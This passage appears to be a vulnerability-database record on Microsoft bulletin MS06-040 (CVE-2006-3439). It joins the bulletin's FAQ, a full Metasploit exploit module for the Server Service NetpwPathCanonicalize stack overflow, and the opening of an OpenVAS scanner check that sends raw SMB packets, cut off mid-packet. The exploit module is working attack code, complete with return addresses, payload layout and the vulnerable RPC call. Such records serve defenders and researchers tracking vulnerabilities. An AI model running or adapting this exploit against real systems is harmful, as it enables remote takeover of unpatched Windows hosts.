systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Server service.\r\n\r\nWhat is the Server service?\r\nThe Server service provides RPC support, file print support and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to execute code.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWhile all workstations and servers are at risk regarding this issue, Windows 2000 systems are primarily at risk due to the unique characteristics of the vulnerability and affected code path.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Server service validates the length of a message it receives in RPC communications before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2006-3439.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS06-035?\r\nWhile both vulnerabilities were in Server service this update addresses a new vulnerability that was not addressed as part of MS06-035. MS06-035 helps protect against the vulnerability that is discussed in that bulletin, but does not address this new vulnerability. This update does not replace MS06-035. You must install this update and the update that is provided as part of the MS06-035 security bulletin to help protect your system against both vulnerabilities.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (August 8, 2006): Bulletin published.", "modified": "2006-08-08T00:00:00", "published": "2006-08-08T00:00:00", "id": "SECURITYVULNS:DOC:13789", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13789", "title": "Microsoft Security Bulletin MS06-040 Vulnerability in Server Service Could Allow Remote Code Execution (921883)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:29", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/82940/Microsoft-Server-Service-NetpwPathCanonicalize-Overflow.html", "id": "PACKETSTORM:82940", "type": "packetstorm", "title": "Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the NetApi32 CanonicalizePathName() function \nusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that \nother RPC calls could be used to exploit this service. This exploit will result in \na denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt \nwill likely result in a complete reboot on Windows 2000 and the termination of all \nSMB-related services on Windows XP. The default target for this exploit should succeed \non Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. \n}, \n'Author' => \n[ \n'hdm' \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-3439' ], \n[ 'OSVDB', '27845' ], \n[ 'BID', '19409' ], \n[ 'MSB', 'MS06-040' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n# Technically we can use more space than this, but by limiting it \n# to 370 bytes we can use the same request for all Windows SPs. \n'Space' => 370, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'DefaultTarget' => 0, \n'Targets' => \n[ \n[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], \n[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', \n{ \n'Offset' => 1000, \n'Ret' => 0x00020804 \n} \n], \n[ '(wcscpy) Windows XP SP0/SP1', \n{ \n'Offset' => 612, \n'Ret' => 0x00020804 \n} \n], \n[ '(stack) Windows XP SP1 English', \n{ \n'OffsetA' => 656, \n'OffsetB' => 680, \n'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll \n} \n], \n[ '(stack) Windows XP SP1 Italian', \n{ \n'OffsetA' => 656, \n'OffsetB' => 680, \n'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll \n} \n], \n[ '(wcscpy) Windows 2003 SP0', \n{ \n'Offset' => 612, \n'Ret' => 0x00020804 \n} \n], \n], \n \n'DisclosureDate' => 'Aug 8 2006')) \n \nregister_options( \n[ \nOptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']), \n], self.class) \n \nend \n \ndef exploit \n \nconnect() \nsmb_login() \n \nif (target.name =~ /Automatic/) \ncase smb_peer_os() \nwhen 'Windows 5.0' \nprint_status(\"Detected a Windows 2000 target\") \ntarget = targets[1] \n \nwhen 'Windows NT 4.0' \nprint_status(\"Detected a Windows NT 4.0 target\") \ntarget = targets[1] \n \nwhen 'Windows 5.1' \nbegin \nsmb_create(\"\\\\SRVSVC\") \nprint_status(\"Detected a Windows XP SP0/SP1 target\") \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nif (e.error_code == 0xc0000022) \nprint_status(\"Windows XP SP2 is not exploitable\") \nreturn \nend \nprint_status(\"Detected a Windows XP target (unknown patch level)\") \nend \ntarget = targets[2] \n \nwhen /Windows Server 2003 (\\d+)$/ \nprint_status(\"Detected a Windows 2003 SP0 target\") \ntarget = targets[5] \n \nwhen /Windows Server 2003 (\\d+) Service Pack (\\d+)/ \nprint_status(\"Windows 2003 SP#{$2} is not exploitable\") \nreturn \n \nwhen /Samba/ \nprint_status(\"Samba is not vulnerable\") \nreturn \n \nelse \nprint_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\") \nreturn \nend \nend \n \n# Specific fixups for Windows NT \ncase smb_peer_os() \nwhen 'Windows NT 4.0' \nprint_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\") \ndatastore['SMB::pipe_write_min_size'] = 2048 \ndatastore['SMB::pipe_write_max_size'] = 4096 \nend \n \nhandle = dcerpc_handle( \n'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', \n'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"] \n) \n \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \n# \n# /* Function 0x1f at 0x767e912c */ \n# long function_1f ( \n# [in] [unique] [string] wchar_t * arg_00, \n# [in] [string] wchar_t * arg_01, \n# [out] [size_is(arg_03)] char * arg_02, \n# [in] [range(0, 64000)] long arg_03, \n# [in] [string] wchar_t * arg_04, \n# [in,out] long * arg_05, \n# [in] long arg_06 \n# ); \n# \n \nprint_status(\"Building the stub data...\") \nstub = '' \n \ncase target.name \n \n# This covers NT 4.0 as well \nwhen /wcscpy.*Windows 2000/ \n \ncode = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded \n \npath = code + ( [target.ret].pack('V') * 16 ) + \"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(250)+1) + \nNDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") + \nNDR.long(rand(250)+1) + \nNDR.long(0) \n \nwhen /wcscpy.*Windows XP/ \npath = \n# Payload goes first \npayload.encoded + \n \n# Padding \nrand_text_alphanumeric(target['Offset'] - payload.encoded.length) + \n \n# Land 6 bytes in to bypass garbage (XP SP0) \n[ target.ret + 6 ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode (XP SP0) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# Jump straight to shellcode (XP SP1) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode (XP SP1) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# Terminate the path \n\"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \n \nwhen /stack/ \nbuff = rand_text_alphanumeric(800) \nbuff[0, payload.encoded.length] = payload.encoded \nbuff[ target['OffsetA'], 4 ] = [target.ret].pack('V') \nbuff[ target['OffsetB'], 5 ] = \"\\xe9\" + [ (target['OffsetA'] + 5) * -1 ].pack('V') \n \npath = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \n \nwhen /wcscpy.*Windows 2003/ \npath = \n# Payload goes first \npayload.encoded + \n \n# Padding \nrand_text_alphanumeric(target['Offset'] - payload.encoded.length) + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# The cookie is constant, \n# noticed by Nicolas Pouvesle in Misc #28 \n\"\\x4e\\xe6\\x40\\xbb\" + \n \n# Padding \nrand_text_alphanumeric(4) + \n \n# Jump straight to shellcode \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(40) + \n \n# Terminate the path \n\"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \nend \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ndcerpc.call(0x1f, stub) \ndcerpc.call(0x1f, stub) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nrescue => e \nif e.to_s !~ /STATUS_PIPE_DISCONNECTED/ \nraise e \nend \nend \n \n# Cleanup \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82940/ms06_040_netapi.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:29", "bulletinFamily": "scanner", "description": "This host is missing important security update according to\n Microsoft Bulletin MS06-040.", "modified": "2019-05-03T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:1361412562310902782", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902782", "title": "Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902782\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_bugtraq_id(19409);\n script_cve_id(\"CVE-2006-3439\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"creation_date\", value:\"2011-12-30 11:26:07 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_name(\"Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/21388/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1016667\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms06-040\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote code execution by sending a\n specially crafted RPC request and can take complete control of an affected system.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows XP Service Pack 2 and prior\n\n Microsoft Windows 2K3 Service Pack 1 and prior\n\n Microsoft Windows 2000 Service Pack 4 and prior.\");\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error in the 'CanonicalizePathName()'\n function in netapi32.dll and can be exploited to cause a stack-based buffer\n overflow via a malicious NetrpPathCanonicalize RPC request with an overly\n long path name to the Server Service.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing important security update according to\n Microsoft Bulletin MS06-040.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp ) {\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif( smb_sess_resp && strlen( smb_sess_resp ) > 33 ) {\n uid_low = ord( smb_sess_resp[32] );\n uid_high = ord( smb_sess_resp[33] );\n uid = uid_high * 256;\n uid += uid_low;\n} else {\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string( uid_low, uid_high ) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif( ! smb_tree_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## NT Create AndX Request, FID: 0x4000, Path: \\browser\nnt_creat_req = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x00, 0x01, 0x18, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x10, 0x00, 0x16, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x12, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x40, 0x00,\n 0x02, 0x00, 0x00, 0x00, 0x03, 0x13, 0x00, 0x00,\n 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x00, 0x00);\n\nsend( socket:soc, data:nt_creat_req );\nnt_creat_resp = smb_recv( socket:soc );\nif( ! nt_creat_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## DCERPC Bind: call_id: 0 SRVSVC V3.0\ndcerpc_bind_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x40, 0x01, 0x0e, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff,\n 0xff, 0xff, 0xff, 0x08, 0x00, 0x48, 0x00, 0x00,\n 0x00, 0x48, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x49, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03,\n 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b,\n 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47,\n 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00,\n 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,\n 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,\n 0x02, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:dcerpc_bind_req );\ndcerpc_bind_resp = smb_recv( socket:soc );\nif( ! dcerpc_bind_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## Read AndX Request, FID: 0x4000\nread_andx_req = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x80, 0x01, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x04, 0x00, 0x04, 0xff, 0xff, 0xff, 0xff, 0x00,\n 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:read_andx_req );\nread_andx_resp = smb_recv( socket:soc );\nif( ! read_andx_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## Packet type: 12 (Bind_ack) @ offset 66 - 1 byte\n## Auth Length: 00 @ Offset 74 - 2 bytes\n## Call ID : 00 @ Offset 76 - 4 bytes\n\nif( strlen( read_andx_resp ) > 79 &&\n ! ( ord( read_andx_resp[66] ) == 12 && ord( read_andx_resp[74] ) == 00 &&\n ord( read_andx_resp[75] ) == 00 && ord( read_andx_resp[76] ) == 00 &&\n ord( read_andx_resp[77] ) == 00 && ord( read_andx_resp[78] ) == 00 &&\n ord( read_andx_resp[79] ) == 00 ) ) {\n close( soc );\n exit( 0 );\n}\n\n## NetPathCanonicalize request\nnetpath_can_req = raw_string(0x00, 0x00, 0x00, 0xb8, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 